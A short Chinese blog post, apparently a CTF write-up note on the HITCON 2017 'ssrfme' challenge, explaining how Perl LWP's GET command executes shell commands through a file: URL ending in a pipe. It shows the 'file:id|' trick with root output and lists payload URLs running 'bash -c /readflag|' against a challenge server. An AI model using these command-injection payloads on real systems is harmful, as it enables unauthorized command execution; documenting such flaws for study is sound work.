GET的命令执行漏洞

源于hitcon中的题目ssrfme的wp,然后去搜了下这个漏洞,做个简单的记录吧。https://lorexxar.cn/2017/11/10/hitcon2017-writeup/#sql-so-hard

首先要先知道perl的open可以执行命令,如下:

而在GET命令中存在open函数

1
2
3
file.pm
84: opendir(D, $path) or
132: open(F, $path) or return new

同时open函数还支持file协议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@iZ285ei82c1Z:~/test# cat /usr/share/perl5/LWP.pm
...
=head2 File Request
The library supports GET and HEAD methods for file requests. The
"If-Modified-Since" header is supported. All other headers are
ignored. The I<host> component of the file URL must be empty or set
to "localhost". Any other I<host> value will be treated as an error.
Directories are always converted to an HTML document. For normal
files, the "Content-Type" and "Content-Encoding" in the response are
guessed based on the file suffix.
Example:
$req = HTTP::Request->new(GET => 'file:/etc/passwd');
...

但是很尴尬的是,接下来的复现失败了,只能copy@LoRexxar师傅的了。
我们可以测试一下

1
2
root@iZ285ei82c1Z:~/test# GET 'file:id|'
uid=0(root) gid=0(root) groups=0(root)

发现成功执行了命令,payload来自rr的博客

1
2
3
http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=bash%20-c%20/readflag|
http://13.115.136.15/?url=file:bash%20-c%20/readflag|&filename=bash%20-c%20/readflag|
http://13.115.136.15/sandbox/c36eb1c4372f5f8131542751d486cebd/bash%20-c%20/readflag%7C

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,